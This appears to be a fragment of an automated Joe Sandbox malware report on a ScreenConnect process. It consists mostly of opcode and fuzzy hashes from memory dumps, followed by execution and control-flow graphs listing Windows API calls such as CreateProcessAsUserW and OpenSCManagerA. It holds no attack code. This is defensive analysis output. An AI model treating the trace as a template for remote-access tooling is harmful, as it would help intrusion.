                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e39eaf9978108cc74a114beae37b4b288305b158c5d5de94336529e06fdd738
                                                                                                                                                  • Instruction ID: 62103c984318672ade5d7347d9063e19f3629653ce5fff6015ee1226248c8d24
                                                                                                                                                  • Opcode Fuzzy Hash: 5e39eaf9978108cc74a114beae37b4b288305b158c5d5de94336529e06fdd738
                                                                                                                                                  • Instruction Fuzzy Hash: 4E110271E00305AFCB21CF68C941AEEBBB1AFC4720F5485AED584DB161E771AD42EB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 254b47103e0f69f293b0d90487f8b9b57495de4bb156df2384e66d4edfbd4602
                                                                                                                                                  • Instruction ID: c4207fcaf51699ec8ffea2015cb957b76ca12482db0feb336f728d9899d1d769
                                                                                                                                                  • Opcode Fuzzy Hash: 254b47103e0f69f293b0d90487f8b9b57495de4bb156df2384e66d4edfbd4602
                                                                                                                                                  • Instruction Fuzzy Hash: 4111E171F00206AFDB14CE69C901EAFBBB6AFC4B10F94C569D544D7250E7B1A941EB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 40b7f3658bb08315ba804dd7bd2c9a30378a12b36044769210ebe1d234a189e7
                                                                                                                                                  • Instruction ID: 5f5c64b70c857a2907828c6bbe21afddc4b35fdbb4092f4eb08af74918141345
                                                                                                                                                  • Opcode Fuzzy Hash: 40b7f3658bb08315ba804dd7bd2c9a30378a12b36044769210ebe1d234a189e7
                                                                                                                                                  • Instruction Fuzzy Hash: F8115E3294004EDBCF01DFA8D644EDCBFB2FF80314B54C558D109AB116DB71A986EBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7277888c6b6cfd655eb5e26dec9bc01374ee95c835272d5a9f260736e8c8bf8e
                                                                                                                                                  • Instruction ID: 98357e46341d555a13461453a615a9f9d93610c18fbf13ad451e38a1050e0113
                                                                                                                                                  • Opcode Fuzzy Hash: 7277888c6b6cfd655eb5e26dec9bc01374ee95c835272d5a9f260736e8c8bf8e
                                                                                                                                                  • Instruction Fuzzy Hash: 9D111236A00109DFCF01DFA8D9409DEBBF5FF49314B508569E609BB261D771AA0ACF91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2381984406.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f6d000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 73f0995ef6df0f0b5ff7cca861e9cba4c92d335811e84be90e7920d64fa23e67
                                                                                                                                                  • Instruction ID: 40c4cae4250eb0d2382927155a183ab0f07724c0eed51181a53775a2dc6b3b19
                                                                                                                                                  • Opcode Fuzzy Hash: 73f0995ef6df0f0b5ff7cca861e9cba4c92d335811e84be90e7920d64fa23e67
                                                                                                                                                  • Instruction Fuzzy Hash: 77012B72E04340FAE7104E25CDC0B67BF98DF85334F18C01AED094B18AC6B99841E7B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2381984406.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f6d000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d3c293c8945d3c05dc8870cafb83748c195bceb06455a44faf097886ef1747ec
                                                                                                                                                  • Instruction ID: f10142c2ab3d2d24e54cbb0907d8fe811d54f5b1598ea0fc00f8c23b91a35898
                                                                                                                                                  • Opcode Fuzzy Hash: d3c293c8945d3c05dc8870cafb83748c195bceb06455a44faf097886ef1747ec
                                                                                                                                                  • Instruction Fuzzy Hash: 87014C6190E3C09FE7128B258894B52BFB4EF53224F1981DBE9888F1A7C2695849C772
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ced20b626b77ab5cdbc426f71c190ffbc7121c2f1be2cc79648026147c94331c
                                                                                                                                                  • Instruction ID: 781443763e0600c63bcd6dba1060a7c4691d7e2a2c6cbdca8d82c6c763f7bf6f
                                                                                                                                                  • Opcode Fuzzy Hash: ced20b626b77ab5cdbc426f71c190ffbc7121c2f1be2cc79648026147c94331c
                                                                                                                                                  • Instruction Fuzzy Hash: 8101DF30A093458FC706AB74D919A143BB5FF8732431540EED5098B673CB34CC42DB52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a88002096d8812cb981e60edd614a15f1c580258ea90ac688e7d75dc601a237e
                                                                                                                                                  • Instruction ID: 97e3c28ee1dc6fe3f50fd243135cc3ab8bddaeb096ff6cf5ff3f38f6e6b37676
                                                                                                                                                  • Opcode Fuzzy Hash: a88002096d8812cb981e60edd614a15f1c580258ea90ac688e7d75dc601a237e
                                                                                                                                                  • Instruction Fuzzy Hash: 05F08C37B0D2446FD728CABAA401A9BBBDECBD4220B14C07FE94DC3780E931A8018764
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c761797a54ecd8e9b1a165096a46c7ffba6562090cf7014c50f3920aaf644d8e
                                                                                                                                                  • Instruction ID: 5f55fac730bda6c217d5e1bc48e0be91cb36db4c4e3d833349060a182c6c77e4
                                                                                                                                                  • Opcode Fuzzy Hash: c761797a54ecd8e9b1a165096a46c7ffba6562090cf7014c50f3920aaf644d8e
                                                                                                                                                  • Instruction Fuzzy Hash: CFF06D356003018FC746AB7CD645A993BF1EFC5724310856FD529CB615EB709C26AB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67c418e7ef9d0a0f9e7837c3b57732797ebd7aeac8a04118011fce8b9fe889aa
                                                                                                                                                  • Instruction ID: 66cbd844d6a4e668848900f0135399baf52afcacd7326bb76cdf6e37417be4c0
                                                                                                                                                  • Opcode Fuzzy Hash: 67c418e7ef9d0a0f9e7837c3b57732797ebd7aeac8a04118011fce8b9fe889aa
                                                                                                                                                  • Instruction Fuzzy Hash: FBF02B6310C3A28FD316D779E8122D87FA1EE9332474445CFD0818F593D698A906D756
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f2f301f97a3242d31af760e056945e6896dc2f1303df6a11b21879b80baf6ff1
                                                                                                                                                  • Instruction ID: eecdd66b651a814b01d618d84796b2081400707acd4462314bbb21e5f3a2c717
                                                                                                                                                  • Opcode Fuzzy Hash: f2f301f97a3242d31af760e056945e6896dc2f1303df6a11b21879b80baf6ff1
                                                                                                                                                  • Instruction Fuzzy Hash: E2F0E576E0E3529FC355CB75E50269A7BE99F85220704C0BFE51CD7140E93488028B35
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4972476b816dd618e5f464b80cdbbdf7f410c12d03c558aa67fbc64650bc0db9
                                                                                                                                                  • Instruction ID: efa1de5eb1061786c79c845a69505ae487abac9c25708cbe5355056071765f8c
                                                                                                                                                  • Opcode Fuzzy Hash: 4972476b816dd618e5f464b80cdbbdf7f410c12d03c558aa67fbc64650bc0db9
                                                                                                                                                  • Instruction Fuzzy Hash: 3BE02B32B05B435FC71555689D46A517BDA4A8A77433C85BDF054CB281F519EC81D381
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 23c6c2ff5613075d22ccc667037650fcee89622fd1c6feb702acff4bd5dc73dd
                                                                                                                                                  • Instruction ID: fc3169648ac26189864cfee61c0efb75ea304c97b0d931ba4d61fc5bd4579c65
                                                                                                                                                  • Opcode Fuzzy Hash: 23c6c2ff5613075d22ccc667037650fcee89622fd1c6feb702acff4bd5dc73dd
                                                                                                                                                  • Instruction Fuzzy Hash: DAF0E5353006059B8306E76DE900A9E3BE5DBC9760300802FE12DCB705DF71EC01ABD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b0dd5ceb8ef971331288ad48f0a8773c0bdf4a62fcb1f0ef1c7f7282d75de982
                                                                                                                                                  • Instruction ID: ea5b2b6371ebf05bf3a7682f0b4c245ecda00b580b4e2bc1cedeba9b523817d5
                                                                                                                                                  • Opcode Fuzzy Hash: b0dd5ceb8ef971331288ad48f0a8773c0bdf4a62fcb1f0ef1c7f7282d75de982
                                                                                                                                                  • Instruction Fuzzy Hash: 1DE09B367003545FC3075778E81D0693BB6EFC5221315496BE51AC77A1DF784C52D7A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c772a57ce3c49006eb22a75e46992b2ddf6b56f15d4b2525abf823c8e63c259e
                                                                                                                                                  • Instruction ID: d09b87931c0d5954238a1445812f43b3f9e0d34536edd26d872058627178871a
                                                                                                                                                  • Opcode Fuzzy Hash: c772a57ce3c49006eb22a75e46992b2ddf6b56f15d4b2525abf823c8e63c259e
                                                                                                                                                  • Instruction Fuzzy Hash: 88E08631B443146787142AAE788C52EBEEAFBC86B5754843DF60EC3341DE758C1693A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8c2d039cfacf97369127b720c151817f8efe38c50f3c64b773bcc7145475c3a1
                                                                                                                                                  • Instruction ID: 01580fa74d56d9886dca36b877edcf8e6a4ac2595ce40f92184effbbfe296566
                                                                                                                                                  • Opcode Fuzzy Hash: 8c2d039cfacf97369127b720c151817f8efe38c50f3c64b773bcc7145475c3a1
                                                                                                                                                  • Instruction Fuzzy Hash: 70E09231B003109B87041AA9648C2297AE6FFC8765310883DF50DD7351DE354C1797A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 02b503b97a79ee1fcb066a4d66db8dfd97f8c7ac98160215dce09b6a17700aa6
                                                                                                                                                  • Instruction ID: 9ee88a0500b38d2725aaaa323bbeea9f37bebe595bfae6bd68ef17414feab0a7
                                                                                                                                                  • Opcode Fuzzy Hash: 02b503b97a79ee1fcb066a4d66db8dfd97f8c7ac98160215dce09b6a17700aa6
                                                                                                                                                  • Instruction Fuzzy Hash: C3E04F22F018525B8B1891589A46B55B2C98B99BB473C857DF428CB285F625EC819280
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fdaa265d7b78026e1ad5971786af51637c3a60e8308292033348e90e83a6170d
                                                                                                                                                  • Instruction ID: e5d14028856cbd59bfd27d8b1cbc3c97fbc6baf21b08b1a40d4996393a3fe336
                                                                                                                                                  • Opcode Fuzzy Hash: fdaa265d7b78026e1ad5971786af51637c3a60e8308292033348e90e83a6170d
                                                                                                                                                  • Instruction Fuzzy Hash: C5E09234A05324CFC3456B70D50C5987BE1FF4636134140A9D40ECB661DB358C42DF82
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5d16729a333d98632e84a70ddf0a34005c222bc947c968e543c4952ea997c38b
                                                                                                                                                  • Instruction ID: 791300b8da3ab3d0a6c68e7119ff6fe0a911adc7ae9ebf7e211812ee4dfc3d5f
                                                                                                                                                  • Opcode Fuzzy Hash: 5d16729a333d98632e84a70ddf0a34005c222bc947c968e543c4952ea997c38b
                                                                                                                                                  • Instruction Fuzzy Hash: FDE02230906346DFC700EB78ED425987BF0EF0130030048CED108DB541D6340E098B01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 724747b47bbc889ab5ac29f69d379accb98e67568c57252de38dbcf3e030efd9
                                                                                                                                                  • Instruction ID: 28cdcfd612bcb0d6d8a942223352b30a1df7437041c7f1ee921767b25dff6f3a
                                                                                                                                                  • Opcode Fuzzy Hash: 724747b47bbc889ab5ac29f69d379accb98e67568c57252de38dbcf3e030efd9
                                                                                                                                                  • Instruction Fuzzy Hash: ABE0D83120C7A28FC316E738F4412DD7FE1AFC1324B05499DD0418F556DAA46D0A8796
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a92f5f440967f15afd6e58fbd20a54a4cbeaf6d6e21eb7c21d5aad186918ecfa
                                                                                                                                                  • Instruction ID: 01f0c97ed5555ba4eed074d52e94369c6ac4709d1ec29f385c386d24ae0fd5c7
                                                                                                                                                  • Opcode Fuzzy Hash: a92f5f440967f15afd6e58fbd20a54a4cbeaf6d6e21eb7c21d5aad186918ecfa
                                                                                                                                                  • Instruction Fuzzy Hash: 91E08636300118574205677DF80C46E7BAAEBC9661310852AE51EC3390CF748C4297E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25d94636451f816257dabfd08faed1b8975d5cf45e6694c4ac272885be1789d0
                                                                                                                                                  • Instruction ID: 3862ca02fdf2f5f866d53fe7cda09698fc1672b45a9145b0292907a68e064f62
                                                                                                                                                  • Opcode Fuzzy Hash: 25d94636451f816257dabfd08faed1b8975d5cf45e6694c4ac272885be1789d0
                                                                                                                                                  • Instruction Fuzzy Hash: F3E06D30905305DFCB41DFB4DA411987BF0EF4530471001DED4189B212DB741E12AB51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c6d36a9b142681e1258bd74a130dce70f93ce042dee57a44f20ba64788f4e5af
                                                                                                                                                  • Instruction ID: 75d6309fe029f8c5e13c6684746529acac1b51fc9e14fc5935c5e6540a481b23
                                                                                                                                                  • Opcode Fuzzy Hash: c6d36a9b142681e1258bd74a130dce70f93ce042dee57a44f20ba64788f4e5af
                                                                                                                                                  • Instruction Fuzzy Hash: ADE0DF308883928FC3418F68D4880D47FE0AB12334B48449ED5808E552D2399887CB53
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a40f69b7b12c293ceb1eea54752212345a27f062c929f6961d9d958b5db8a17b
                                                                                                                                                  • Instruction ID: 39857e120cefd4a661aa1e7ff4e786bf89ae2abda8fd7a56abb078c2e55271a2
                                                                                                                                                  • Opcode Fuzzy Hash: a40f69b7b12c293ceb1eea54752212345a27f062c929f6961d9d958b5db8a17b
                                                                                                                                                  • Instruction Fuzzy Hash: 82E0DF3008D3825FC3029B64D88A2C17FF0EB06320F0408AED4858E583D279A857CBA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f3038c4ed22f5ab22a06dd20c827132895901946fef3c277f5c83ba08fb713e5
                                                                                                                                                  • Instruction ID: 003761ccb244dd1688b22731f3a475f1bb0c269de83b4abe973ac06455ef1cc2
                                                                                                                                                  • Opcode Fuzzy Hash: f3038c4ed22f5ab22a06dd20c827132895901946fef3c277f5c83ba08fb713e5
                                                                                                                                                  • Instruction Fuzzy Hash: F2E08670D04356DFC350CFB8C646549BFB0EB05364324C2DEC86D8F692D63684038B81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 024dc6f27ba608b5ccf5fedd4518050cf28f89b67b0ce1b08a0dac9e0488d74e
                                                                                                                                                  • Instruction ID: 4b54974c3de9fb3dfaecdc349c8135f3452c3268562d598a16989a2b55f7c99f
                                                                                                                                                  • Opcode Fuzzy Hash: 024dc6f27ba608b5ccf5fedd4518050cf28f89b67b0ce1b08a0dac9e0488d74e
                                                                                                                                                  • Instruction Fuzzy Hash: A2D01730A0120CFF8B00EFA8ED0555DBBF9EB44344B5041ADD40CE7201EE712F02AB81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.2382250929.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_fc0000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 14d4f3abfae087b540ae51d45e1174af9772c46db1355eb89058738c6a508952
                                                                                                                                                  • Instruction ID: 5748f0ab5346a43943008bd67b9f431b48ba80e2c635a988ede217ba57babb75
                                                                                                                                                  • Opcode Fuzzy Hash: 14d4f3abfae087b540ae51d45e1174af9772c46db1355eb89058738c6a508952
                                                                                                                                                  • Instruction Fuzzy Hash: D5D05E71A0120CEFCB40EFBDED4565DBBFAEB44204B1089ADE90DE7240EA356F049B90

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:9.7%
                                                                                                                                                  Total number of Nodes:31
                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                  execution_graph 27420 5c02180 27422 5c021d3 CreateProcessAsUserW 27420->27422 27423 5c02264 27422->27423 27424 5c03e60 27425 5c03e7e 27424->27425 27427 5c03e97 27425->27427 27430 5c03fb1 27425->27430 27429 5c03fb1 CreateFileA 27429->27427 27432 5c03fb4 27430->27432 27435 5c0dbc0 27432->27435 27439 5c0dbb0 27432->27439 27436 5c0dbd3 27435->27436 27443 5c0d730 27436->27443 27440 5c0dbd3 27439->27440 27441 5c0d730 CreateFileA 27440->27441 27442 5c03ec0 27441->27442 27442->27429 27444 5c0dc10 CreateFileA 27443->27444 27446 5c0dd45 27444->27446 27447 5c04028 27448 5c04070 WaitNamedPipeW 27447->27448 27449 5c0406a 27447->27449 27450 5c040a4 27448->27450 27449->27448 27451 6221248 27452 6221269 27451->27452 27454 6221370 27451->27454 27452->27452 27458 6221400 27454->27458 27462 62213f4 27454->27462 27459 622145b OpenSCManagerA 27458->27459 27461 6221543 27459->27461 27463 6221400 OpenSCManagerA 27462->27463 27465 6221543 27463->27465

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 417 5c02180-5c021d1 418 5c021d3-5c021d9 417->418 419 5c021dc-5c021e0 417->419 418->419 420 5c021e2-5c021e5 419->420 421 5c021e8-5c021fd 419->421 420->421 422 5c0220b-5c02262 CreateProcessAsUserW 421->422 423 5c021ff-5c02208 421->423 424 5c02264-5c0226a 422->424 425 5c0226b-5c02293 422->425 423->422 424->425
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C0224F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2448356137.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcessUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2217836671-0
                                                                                                                                                  • Opcode ID: 4e39dbb26a147fb334dbe00bce8241e3d14ea720960a7d2e8652b0729ecbdd3f
                                                                                                                                                  • Instruction ID: 458aec7784c1db58f0acfa07156786d1461d761734d8ea47c38a8292fcaf4a73
                                                                                                                                                  • Opcode Fuzzy Hash: 4e39dbb26a147fb334dbe00bce8241e3d14ea720960a7d2e8652b0729ecbdd3f
                                                                                                                                                  • Instruction Fuzzy Hash: 1341F37690020ADFCF11CFA9C884ADEBBF5FF48320F15852AE918A7250D775AA55CF90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
